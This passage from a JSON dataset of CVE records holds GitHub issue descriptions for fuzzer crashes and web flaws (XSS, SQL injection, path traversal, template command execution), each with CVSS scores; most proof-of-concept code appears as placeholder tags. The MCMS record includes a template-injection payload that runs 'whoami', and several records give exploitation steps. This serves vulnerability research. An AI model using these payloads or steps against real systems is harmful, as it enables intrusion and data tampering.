  76066. "CVE_ID": "CVE-2021-46047",
  76067. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2008",
  76068. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2008",
  76069. "Repo_new": "gpac/gpac",
  76070. "Issue_Created_At": "2021-12-22T18:56:01Z",
  76071. "description": "Untrusted pointer dereference in gf_hinter_finalize (). Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Abort bt ERRORTAG",
  76072. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76073. "severity": "MEDIUM",
  76074. "baseScore": 5.5,
  76075. "impactScore": 3.6,
  76076. "exploitabilityScore": 1.8
  76077. },
  76078. {
  76079. "CVE_ID": "CVE-2021-46048",
  76080. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/4412",
  76081. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/4412",
  76082. "Repo_new": "webassembly/binaryen",
  76083. "Issue_Created_At": "2021-12-25T07:56:15Z",
  76084. "description": "A abort failure in APITAG Version: APITAG command: APITAG FILETAG Result abort bt ERRORTAG",
  76085. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76086. "severity": "MEDIUM",
  76087. "baseScore": 5.5,
  76088. "impactScore": 3.6,
  76089. "exploitabilityScore": 1.8
  76090. },
  76091. {
  76092. "CVE_ID": "CVE-2021-46049",
  76093. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2013",
  76094. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2013",
  76095. "Repo_new": "gpac/gpac",
  76096. "Issue_Created_At": "2021-12-24T07:13:51Z",
  76097. "description": "Untrusted pointer dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault bt CODETAG",
  76098. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76099. "severity": "MEDIUM",
  76100. "baseScore": 5.5,
  76101. "impactScore": 3.6,
  76102. "exploitabilityScore": 1.8
  76103. },
  76104. {
  76105. "CVE_ID": "CVE-2021-46050",
  76106. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/4391",
  76107. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/4391",
  76108. "Repo_new": "webassembly/binaryen",
  76109. "Issue_Created_At": "2021-12-14T12:41:56Z",
  76110. "description": "Invalid memory address dereference in __vfprintf_internal (). Version: APITAG System information command: APITAG FILETAG Result APITAG GDB information ERRORTAG",
  76111. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76112. "severity": "MEDIUM",
  76113. "baseScore": 5.5,
  76114. "impactScore": 3.6,
  76115. "exploitabilityScore": 1.8
  76116. },
  76117. {
  76118. "CVE_ID": "CVE-2021-46051",
  76119. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2011",
  76120. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2011",
  76121. "Repo_new": "gpac/gpac",
  76122. "Issue_Created_At": "2021-12-24T06:14:20Z",
  76123. "description": "Untrusted pointer dereference in APITAG (). Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault bt CODETAG",
  76124. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76125. "severity": "MEDIUM",
  76126. "baseScore": 5.5,
  76127. "impactScore": 3.6,
  76128. "exploitabilityScore": 1.8
  76129. },
  76130. {
  76131. "CVE_ID": "CVE-2021-46052",
  76132. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/4411",
  76133. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/4411",
  76134. "Repo_new": "webassembly/binaryen",
  76135. "Issue_Created_At": "2021-12-25T07:43:44Z",
  76136. "description": "A abort failure in APITAG (). Version: APITAG command: APITAG FILETAG Result Aborted. bt ERRORTAG",
  76137. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76138. "severity": "MEDIUM",
  76139. "baseScore": 5.5,
  76140. "impactScore": 3.6,
  76141. "exploitabilityScore": 1.8
  76142. },
  76143. {
  76144. "CVE_ID": "CVE-2021-46053",
  76145. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/4392",
  76146. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/4392",
  76147. "Repo_new": "webassembly/binaryen",
  76148. "Issue_Created_At": "2021-12-14T12:53:22Z",
  76149. "description": "Program terminated with signal SIGKILL, Killed.. Version: APITAG System information command: APITAG FILETAG Result Program terminated with signal SIGKILL, Killed.",
  76150. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76151. "severity": "MEDIUM",
  76152. "baseScore": 5.5,
  76153. "impactScore": 3.6,
  76154. "exploitabilityScore": 1.8
  76155. },
  76156. {
  76157. "CVE_ID": "CVE-2021-46054",
  76158. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/4410",
  76159. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/4410",
  76160. "Repo_new": "webassembly/binaryen",
  76161. "Issue_Created_At": "2021-12-25T07:10:11Z",
  76162. "description": "A abort failure in APITAG ). Version: APITAG command: APITAG FILETAG Result APITAG bt ERRORTAG",
  76163. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76164. "severity": "MEDIUM",
  76165. "baseScore": 5.5,
  76166. "impactScore": 3.6,
  76167. "exploitabilityScore": 1.8
  76168. },
  76169. {
  76170. "CVE_ID": "CVE-2021-46055",
  76171. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/4413",
  76172. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/4413",
  76173. "Repo_new": "webassembly/binaryen",
  76174. "Issue_Created_At": "2021-12-25T08:10:49Z",
  76175. "description": "A abort failure in APITAG Version: APITAG command: APITAG FILETAG Result Aborted. bt ERRORTAG",
  76176. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76177. "severity": "MEDIUM",
  76178. "baseScore": 5.5,
  76179. "impactScore": 3.6,
  76180. "exploitabilityScore": 1.8
  76181. },
  76182. {
  76183. "CVE_ID": "CVE-2021-46062",
  76184. "Issue_Url_old": "https://github.com/ming-soft/MCMS/issues/59",
  76185. "Issue_Url_new": "https://github.com/ming-soft/mcms/issues/59",
  76186. "Repo_new": "ming-soft/mcms",
  76187. "Issue_Created_At": "2021-12-28T13:49:01Z",
  76188. "description": "APITAG any file. SSTI APITAG template is used in the project\uff0cand there is no secure configuration Insert the payload in the background > system settings > template management APITAG ${value(\"whoami\")} FILETAG PATHTAG There's a suffix check, it's written to the file FILETAG PATHTAG APITAG of this class is called FILETAG coverage PATHTAG APITAG the home page FILETAG Delete any file If the APITAG argument exists, the corresponding file is deleted FILETAG Call the APITAG FILETAG poc\uff1a APITAG destination",
  76189. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
  76190. "severity": "HIGH",
  76191. "baseScore": 7.1,
  76192. "impactScore": 5.2,
  76193. "exploitabilityScore": 1.8
  76194. },
  76195. {
  76196. "CVE_ID": "CVE-2021-46083",
  76197. "Issue_Url_old": "https://github.com/chenniqing/uscat/issues/1",
  76198. "Issue_Url_new": "https://github.com/chenniqing/uscat/issues/1",
  76199. "Repo_new": "chenniqing/uscat",
  76200. "Issue_Created_At": "2021-12-29T02:42:51Z",
  76201. "description": "There is a stored xss vulnerability exists in uscat.. FILETAG The input sensitive parameters are not filtered, resulting in malicious code at URL: URLTAG After being parsed and executed, all users accessing this URL will be affected. FILETAG",
  76202. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  76203. "severity": "MEDIUM",
  76204. "baseScore": 5.4,
  76205. "impactScore": 2.7,
  76206. "exploitabilityScore": 2.3
  76207. },
  76208. {
  76209. "CVE_ID": "CVE-2021-46084",
  76210. "Issue_Url_old": "https://github.com/chenniqing/uscat/issues/2",
  76211. "Issue_Url_new": "https://github.com/chenniqing/uscat/issues/2",
  76212. "Repo_new": "chenniqing/uscat",
  76213. "Issue_Created_At": "2021-12-29T03:32:16Z",
  76214. "description": "There is a stored xss vulnerability exists in uscat.. FILETAG XSS payload will be executed on the registration page at the front of the website. Any user who opens the registration page(url: URLTAG will be affected FILETAG",
  76215. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  76216. "severity": "MEDIUM",
  76217. "baseScore": 5.4,
  76218. "impactScore": 2.7,
  76219. "exploitabilityScore": 2.3
  76220. },
  76221. {
  76222. "CVE_ID": "CVE-2021-46085",
  76223. "Issue_Url_old": "https://github.com/zhangyd-c/OneBlog/issues/29",
  76224. "Issue_Url_new": "https://github.com/zhangyd-c/oneblog/issues/29",
  76225. "Repo_new": "zhangyd-c/oneblog",
  76226. "Issue_Created_At": "2021-12-29T09:33:16Z",
  76227. "description": "There is a Insecure Permissions vulnerability exists in APITAG NUMBERTAG FILETAG Low level administrator root NUMBERTAG FILETAG Step NUMBERTAG log in to the system with root NUMBERTAG and enter the user management page FILETAG Step NUMBERTAG click the delete button to directly delete the administrator user admin FILETAG Delete succeeded\uff01 In addition, you can also use burpsuite to capture packets and delete any user (including yourself) by modifying the value of ids. This is a logical vulnerability because the default secondary rule of the system is that you cannot delete yourself) The first step is to log in to the background with root NUMBERTAG account and enter user management. FILETAG Step NUMBERTAG after the packet capturing mode is enabled, click the delete button corresponding to user test FILETAG You can delete any user by modifying the value of IDS. Here, I modify the value of IDS to the value of the currently logged in user. FILETAG Delete succeeded\uff01",
  76228. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  76229. "severity": "MEDIUM",
  76230. "baseScore": 6.5,
  76231. "impactScore": 3.6,
  76232. "exploitabilityScore": 2.8
  76233. },
  76234. {
  76235. "CVE_ID": "CVE-2021-46086",
  76236. "Issue_Url_old": "https://github.com/mindskip/xzs-mysql/issues/327",
  76237. "Issue_Url_new": "https://github.com/mindskip/xzs-mysql/issues/327",
  76238. "Repo_new": "mindskip/xzs-mysql",
  76239. "Issue_Created_At": "2021-12-30T05:50:59Z",
  76240. "description": "There is a Insecure Permissions vulnerability exists in XZS. FILETAG The total exam time is NUMBERTAG minutes. You can see the remaining time displayed in the upper right. FILETAG Step NUMBERTAG open the burpsuite agent and click the submit button to obtain the packet capture data. FILETAG The value of dotime indicates the number of seconds between the beginning of this test and clicking submit torque, which can be modified to any number. FILETAG",
  76241. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  76242. "severity": "HIGH",
  76243. "baseScore": 7.5,
  76244. "impactScore": 3.6,
  76245. "exploitabilityScore": 3.9
  76246. },
  76247. {
  76248. "CVE_ID": "CVE-2021-46087",
  76249. "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/19",
  76250. "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/19",
  76251. "Repo_new": "jflyfox/jfinal_cms",
  76252. "Issue_Created_At": "2020-06-03T14:27:59Z",
  76253. "description": "A Stored XSS vulnerability exists in jfinal_cms NUMBERTAG There is a storage XSS vulnerability in the modification of jfinal_CMS user's personal information. The attacker can insert malicious XSS code into the modification of personal information, and then successfully trigger XSS attack when the administrator user views the user's personal information. First, register a user test, then enter the personal information page, insert the malicious XSS attack code in the remarks: payload: ERRORTAG FILETAG Then use the administrator account to view the user information: FILETAG Successfully triggered malicious XSS Code: FILETAG Safety advice: strictly filter the user's input",
  76254. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  76255. "severity": "MEDIUM",
  76256. "baseScore": 5.4,
  76257. "impactScore": 2.7,
  76258. "exploitabilityScore": 2.3
  76259. },
  76260. {
  76261. "CVE_ID": "CVE-2021-46089",
  76262. "Issue_Url_old": "https://github.com/jeecgboot/jeecg-boot/issues/3331",
  76263. "Issue_Url_new": "https://github.com/jeecgboot/jeecg-boot/issues/3331",
  76264. "Repo_new": "jeecgboot/jeecg-boot",
  76265. "Issue_Created_At": "2021-12-29T08:36:51Z",
  76266. "description": "There is an SQL injection vulnerability that can operate the database with root privileges.. version: APITAG poc: CODETAG",
  76267. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  76268. "severity": "CRITICAL",
  76269. "baseScore": 9.8,
  76270. "impactScore": 5.9,
  76271. "exploitabilityScore": 3.9
  76272. },
  76273. {
  76274. "CVE_ID": "CVE-2021-46104",
  76275. "Issue_Url_old": "https://github.com/webp-sh/webp_server_go/issues/92",
  76276. "Issue_Url_new": "https://github.com/webp-sh/webp_server_go/issues/92",
  76277. "Repo_new": "webp-sh/webp_server_go",
  76278. "Issue_Created_At": "2021-12-30T07:58:10Z",
  76279. "description": "Directory Traversal Vulnerability. I found a directory traversal vulnerability in the system. Can traverse the files on the server. FILETAG Solution: Restrict special symbols in the path, such as ../",
  76280. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  76281. "severity": "HIGH",
  76282. "baseScore": 7.5,
  76283. "impactScore": 3.6,
  76284. "exploitabilityScore": 3.9
  76285. },
  76286. {
  76287. "CVE_ID": "CVE-2021-46114",
  76288. "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/172",
  76289. "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/172",
  76290. "Repo_new": "jpressprojects/jpress",
  76291. "Issue_Created_At": "2022-01-09T08:54:40Z",
  76292. "description": "jpress\u540e\u53f0\u5b58\u5728\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e \u90ae\u4ef6\u6a21\u677fproduct. FILETAG",
  76293. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  76294. "severity": "HIGH",
  76295. "baseScore": 8.8,
  76296. "impactScore": 5.9,
  76297. "exploitabilityScore": 2.8
  76298. },
  76299. {
  76300. "CVE_ID": "CVE-2021-46115",
  76301. "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/169",
  76302. "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/169",
  76303. "Repo_new": "jpressprojects/jpress",
  76304. "Issue_Created_At": "2022-01-09T08:49:15Z",
  76305. "description": "jpress\u540e\u53f0\u5b58\u5728\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e \u6a21\u677f\u4e0a\u4f20. \u5ba1\u8ba1\u8fc7\u7a0b APITAG APITAG APITAG ERRORTAG \u6548\u679c\u6f14\u793a \u5f31\u5bc6\u7801\u8fdb\u5165\u540e\u53f0\uff0c\u4fee\u6539\u4e0a\u4f20 FILETAG FILETAG \u8bbf\u95ee URLTAG \uff0c\u53ef\u4ee5\u770b\u5230\u8ba1\u7b97\u5668\u5f39\u51fa\uff0c\u6f0f\u6d1e\u9a8c\u8bc1\u6210\u529f FILETAG",
  76306. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  76307. "severity": "HIGH",
  76308. "baseScore": 7.2,
  76309. "impactScore": 5.9,
  76310. "exploitabilityScore": 1.2
  76311. },
  76312. {
  76313. "CVE_ID": "CVE-2021-46116",
  76314. "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/168",
  76315. "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/168",
  76316. "Repo_new": "jpressprojects/jpress",
  76317. "Issue_Created_At": "2022-01-09T08:44:35Z",
  76318. "description": "jpress\u540e\u53f0\u5b58\u5728\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e \u6a21\u677f\u5b89\u88c5. \u5ba1\u8ba1\u8fc7\u7a0b APITAG \u5728\u9875\u9762\u4e0a\u70b9\u51fb\u5b89\u88c5\u6a21\u677f FILETAG \u4e0a\u4f20\u6076\u610f\u6a21\u677f\u4e4b\u540e\uff0c\u7a0b\u5e8f\u8fd0\u884c\u5230 APITAG PATHTAG FILETAG \u6765\u770b\u5177\u4f53\u4ee3\u7801\uff0c APITAG APITAG FILETAG \u7136\u540e\u5c31\u53ef\u4ee5\u770b\u5230\uff0c\u6211\u4eec\u5199\u7684\u6076\u610f\u6a21\u677f\u5df2\u7ecf\u88ab\u89e3\u538b\u5230\u4e86\u8fd9\u4e2a\u76ee\u5f55\u4e0b FILETAG APITAG APITAG APITAG ERRORTAG \u63a5\u4e0b\u6765\u600e\u4e48\u8fdb\u884c\u5229\u7528\u5462\uff1f\u770b\u5230\u540e\u53f0\u8fd9\u4e2a\u5730\u65b9\u5b58\u5728\u4e00\u4e2a\u6a21\u677f\u9884\u89c8\u529f\u80fd FILETAG APITAG APITAG \u8fd9\u4e2a\u6a21\u677f FILETAG APITAG FILETAG \u6548\u679c\u6f14\u793a \u5f31\u5bc6\u7801\u8fdb\u5165\u540e\u53f0\uff0c\u5b89\u88c5\u6076\u610f\u6a21\u677f FILETAG FILETAG \u5f00\u542f\u6a21\u677f\u9884\u89c8\u529f\u80fd FILETAG \u8bbf\u95ee URLTAG \uff0c\u53d1\u73b0\u8ba1\u7b97\u5668\u5f39\u51fa\uff0c\u6f0f\u6d1e\u9a8c\u8bc1\u6210\u529f FILETAG",
  76319. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  76320. "severity": "HIGH",
  76321. "baseScore": 7.2,
  76322. "impactScore": 5.9,
  76323. "exploitabilityScore": 1.2
  76324. },
  76325. {
  76326. "CVE_ID": "CVE-2021-46117",
  76327. "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/171",
  76328. "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/171",
  76329. "Repo_new": "jpressprojects/jpress",
  76330. "Issue_Created_At": "2022-01-09T08:53:50Z",
  76331. "description": "jpress\u540e\u53f0\u5b58\u5728\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e \u90ae\u4ef6\u6a21\u677fpage. FILETAG",
  76332. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  76333. "severity": "HIGH",
  76334. "baseScore": 7.2,
  76335. "impactScore": 5.9,
  76336. "exploitabilityScore": 1.2
  76337. },
  76338. {
  76339. "CVE_ID": "CVE-2021-46118",
  76340. "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/170",
  76341. "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/170",
  76342. "Repo_new": "jpressprojects/jpress",
  76343. "Issue_Created_At": "2022-01-09T08:52:56Z",
  76344. "description": "jpress\u540e\u53f0\u5b58\u5728\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e \u90ae\u4ef6\u6a21\u677f. FILETAG",
  76345. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  76346. "severity": "HIGH",
  76347. "baseScore": 7.2,
  76348. "impactScore": 5.9,
  76349. "exploitabilityScore": 1.2
  76350. },
  76351. {
  76352. "CVE_ID": "CVE-2021-46141",
  76353. "Issue_Url_old": "https://github.com/uriparser/uriparser/issues/121",
  76354. "Issue_Url_new": "https://github.com/uriparser/uriparser/issues/121",
  76355. "Repo_new": "uriparser/uriparser",
  76356. "Issue_Created_At": "2021-09-29T06:35:00Z",
  76357. "description": "input format check and memory manager issue. A bug was found within the uriparser. Though it might not be an intended use of the relevant API, the bug can still produce critical issues within a program using uriparser. It would be best if the affected logic is checked beforehand. The bug was found with a fuzzer based on the test APITAG For the input provided by the user, it is the address on the Stack Memory, and is free to see if it is the address on the HEAP Memory. Also, as free also uses Memory Manager as shown below, malloc should also use Memory Manager _memory >free(memory, (URI_CHAR )uri APITAG It also requires a Format check for the inputs that the user accidentally or incorrectly entered. _ crash log NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG d9be0 (pc NUMBERTAG ca NUMBERTAG bp NUMBERTAG sp NUMBERTAG fff NUMBERTAG d NUMBERTAG T0) APITAG signal is caused by a WRITE memory access NUMBERTAG ca NUMBERTAG in APITAG , unsigned long, unsigned long, APITAG , APITAG NUMBERTAG d NUMBERTAG in free NUMBERTAG c NUMBERTAG in (anonymous APITAG , void NUMBERTAG fca1c NUMBERTAG a4b2 in APITAG Steps to reproduce NUMBERTAG git clone FILETAG NUMBERTAG cd uriparser & mkdir build & cd build NUMBERTAG Build cmake APITAG APITAG DBUILD_SHARED_LIBS:BOOL=ON .. make j NUMBERTAG Download the attached APITAG NUMBERTAG Build TEST CODE NUMBERTAG cpp) clang++ g fsanitize=address,fuzzer no link o NUMBERTAG cpp I PATHTAG Luriparser/build luriparser NUMBERTAG Run PATHTAG NUMBERTAG OS:ubuntu NUMBERTAG FILETAG",
  76358. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76359. "severity": "MEDIUM",
  76360. "baseScore": 5.5,
  76361. "impactScore": 3.6,
  76362. "exploitabilityScore": 1.8
  76363. },
  76364. {
  76365. "CVE_ID": "CVE-2021-46142",
  76366. "Issue_Url_old": "https://github.com/uriparser/uriparser/issues/122",
  76367. "Issue_Url_new": "https://github.com/uriparser/uriparser/issues/122",
  76368. "Repo_new": "uriparser/uriparser",
  76369. "Issue_Created_At": "2021-09-29T06:38:40Z",
  76370. "description": "input format check and memory manager issue2. A bug was found within the uriparser. Though it might not be an intended use of the relevant API, the bug can still produce critical issues within a program using uriparser. It would be best if the affected logic is checked beforehand. The bug was found with a fuzzer based on the test APITAG Test APITAG APITAG assigns a URI, but this is an address on Stack Memory To assign normally, you must assign a memory from the object in APITAG because it is memory free from the object in APITAG With different Memory Manager, you can become a problem. It also requires a Format check for the inputs that the user accidentally or incorrectly entered. _ crash log NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG d9be0 (pc NUMBERTAG ca NUMBERTAG bp NUMBERTAG sp NUMBERTAG ffd NUMBERTAG e6e0 T0) APITAG signal is caused by a WRITE memory access NUMBERTAG ca NUMBERTAG in APITAG , unsigned long, unsigned long, APITAG , APITAG NUMBERTAG d NUMBERTAG in free NUMBERTAG c NUMBERTAG in (anonymous APITAG , void NUMBERTAG faf2e1ac4b2 in APITAG Steps to reproduce NUMBERTAG git clone FILETAG NUMBERTAG cd uriparser & mkdir build & cd build NUMBERTAG Build cmake APITAG APITAG DBUILD_SHARED_LIBS:BOOL=ON .. make j NUMBERTAG Download the attached APITAG NUMBERTAG Build TEST CODE NUMBERTAG cpp) clang++ g fsanitize=address,fuzzer no link o NUMBERTAG cpp I PATHTAG I uriparser/ Luriparser/build luriparser NUMBERTAG Run PATHTAG NUMBERTAG OS:ubuntu NUMBERTAG FILETAG",
  76371. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76372. "severity": "MEDIUM",
  76373. "baseScore": 5.5,
  76374. "impactScore": 3.6,
  76375. "exploitabilityScore": 1.8
  76376. },
  76377. {
  76378. "CVE_ID": "CVE-2021-46143",
  76379. "Issue_Url_old": "https://github.com/libexpat/libexpat/issues/532",
  76380. "Issue_Url_new": "https://github.com/libexpat/libexpat/issues/532",
  76381. "Repo_new": "libexpat/libexpat",
  76382. "Issue_Created_At": "2021-12-30T19:25:05Z",
  76383. "description": "Reserved NUMBERTAG security issue upcoming). TBA",
  76384. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  76385. "severity": "HIGH",
  76386. "baseScore": 7.8,
  76387. "impactScore": 5.9,
  76388. "exploitabilityScore": 1.8
  76389. },
  76390. {
  76391. "CVE_ID": "CVE-2021-46168",
  76392. "Issue_Url_old": "https://github.com/nimble-code/Spin/issues/56",
  76393. "Issue_Url_new": "https://github.com/nimble-code/spin/issues/56",
  76394. "Repo_new": "nimble-code/spin",
  76395. "Issue_Created_At": "2022-01-02T14:04:47Z",
  76396. "description": "Out of bounds Write in APITAG Out of bounds Write in APITAG Description Out of bounds Write in APITAG at APITAG If there are NUMBERTAG APITAG \uff0cthe yyin will add NUMBERTAG APITAG then, the APITAG at main NUMBERTAG will crash. APITAG If there are more APITAG than APITAG , the APITAG will be negative. APITAG then, the variables before APITAG will add NUMBERTAG Should there be a limit? version NUMBERTAG a0a5 APITAG System information Ubuntu NUMBERTAG focal, AMD EPYC NUMBERTAG Core NUMBERTAG GHz poc APITAG command APITAG Result ERRORTAG gdb ERRORTAG poc APITAG command APITAG Result ERRORTAG gdb CODETAG",
  76397. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76398. "severity": "MEDIUM",
  76399. "baseScore": 5.5,
  76400. "impactScore": 3.6,
  76401. "exploitabilityScore": 1.8
  76402. },
  76403. {
  76404. "CVE_ID": "CVE-2021-46169",
  76405. "Issue_Url_old": "https://github.com/nimble-code/Modex/issues/10",
  76406. "Issue_Url_new": "https://github.com/nimble-code/modex/issues/10",
  76407. "Repo_new": "nimble-code/modex",
  76408. "Issue_Created_At": "2022-01-02T17:23:15Z",
  76409. "description": "Use After Free. Use After Free Description I am learning model checking. But I run a fuzzer for fun today. My fuzzer has found a Use After Free in modex. The chunk NUMBERTAG b NUMBERTAG b0 was APITAG the tcache key was covered and the chunk was freed again. version acfa NUMBERTAG APITAG System information Ubuntu NUMBERTAG focal, AMD EPYC NUMBERTAG Core NUMBERTAG GHz poc CODETAG command APITAG Result ERRORTAG gdb APITAG APITAG n ERRORTAG",
  76410. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76411. "severity": "MEDIUM",
  76412. "baseScore": 5.5,
  76413. "impactScore": 3.6,
  76414. "exploitabilityScore": 1.8
  76415. },
  76416. {
  76417. "CVE_ID": "CVE-2021-46170",
  76418. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4917",
  76419. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4917",
  76420. "Repo_new": "jerryscript-project/jerryscript",
  76421. "Issue_Created_At": "2022-01-03T03:39:39Z",
  76422. "description": "Use After Free at PATHTAG in APITAG APITAG revision a6ab5e9 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case CODETAG Execution steps APITAG asan log ERRORTAG",
  76423. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  76424. "severity": "HIGH",
  76425. "baseScore": 7.5,
  76426. "impactScore": 3.6,
  76427. "exploitabilityScore": 3.9
  76428. },
  76429. {
  76430. "CVE_ID": "CVE-2021-46171",
  76431. "Issue_Url_old": "https://github.com/nimble-code/Modex/issues/8",
  76432. "Issue_Url_new": "https://github.com/nimble-code/modex/issues/8",
  76433. "Repo_new": "nimble-code/modex",
  76434. "Issue_Created_At": "2022-01-02T11:41:42Z",
  76435. "description": "NULL Pointer Dereference in APITAG NULL Pointer Dereference in APITAG Description NULL Pointer Dereference in APITAG at APITAG If there is no APITAG in the first argument of APITAG , s will be NULL and the next APITAG will crash. CODETAG CODETAG CODETAG version acfa NUMBERTAG APITAG System information Ubuntu NUMBERTAG focal, AMD EPYC NUMBERTAG Core NUMBERTAG GHz poc CODETAG command APITAG Result APITAG gdb CODETAG fix Should we add some code here to handle it? If there is no APITAG \uff0cget the substring from the NUMBERTAG st '(' to the NUMBERTAG st ',' in APITAG CODETAG",
  76436. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76437. "severity": "MEDIUM",
  76438. "baseScore": 5.5,
  76439. "impactScore": 3.6,
  76440. "exploitabilityScore": 1.8
  76441. },
  76442. {
  76443. "CVE_ID": "CVE-2021-46203",
  76444. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/13",
  76445. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/13",
  76446. "Repo_new": "taogogo/taocms",
  76447. "Issue_Created_At": "2022-01-04T02:10:14Z",
  76448. "description": "arbitrary file read vulnerability. poc After login as admin,file manager and downloadfunction FILETAG after change path param can read arbitrary file FILETAG analysis FILETAG FILETAG FILETAG we can use ../ to traverse to the previous directory suggest you can check path ,for example check if it has APITAG then refuse this request",
  76449. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  76450. "severity": "MEDIUM",
  76451. "baseScore": 6.5,
  76452. "impactScore": 3.6,
  76453. "exploitabilityScore": 2.8
  76454. },
  76455. {
  76456. "CVE_ID": "CVE-2021-46204",
  76457. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/14",
  76458. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/14",
  76459. "Repo_new": "taogogo/taocms",
  76460. "Issue_Created_At": "2022-01-04T02:47:28Z",
  76461. "description": "There is SQL blind injection at APITAG Link\". analysis The location of the vulnerability is line NUMBERTAG in PATHTAG and the incoming sql statement in the APITAG method does not use intval to process id,and FILETAG extends Article FILETAG FILETAG poc edit link FILETAG FILETAG then edit id as APITAG FILETAG",
  76462. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  76463. "severity": "CRITICAL",
  76464. "baseScore": 9.8,
  76465. "impactScore": 5.9,
  76466. "exploitabilityScore": 3.9
  76467. },
  76468. {
  76469. "CVE_ID": "CVE-2021-46225",
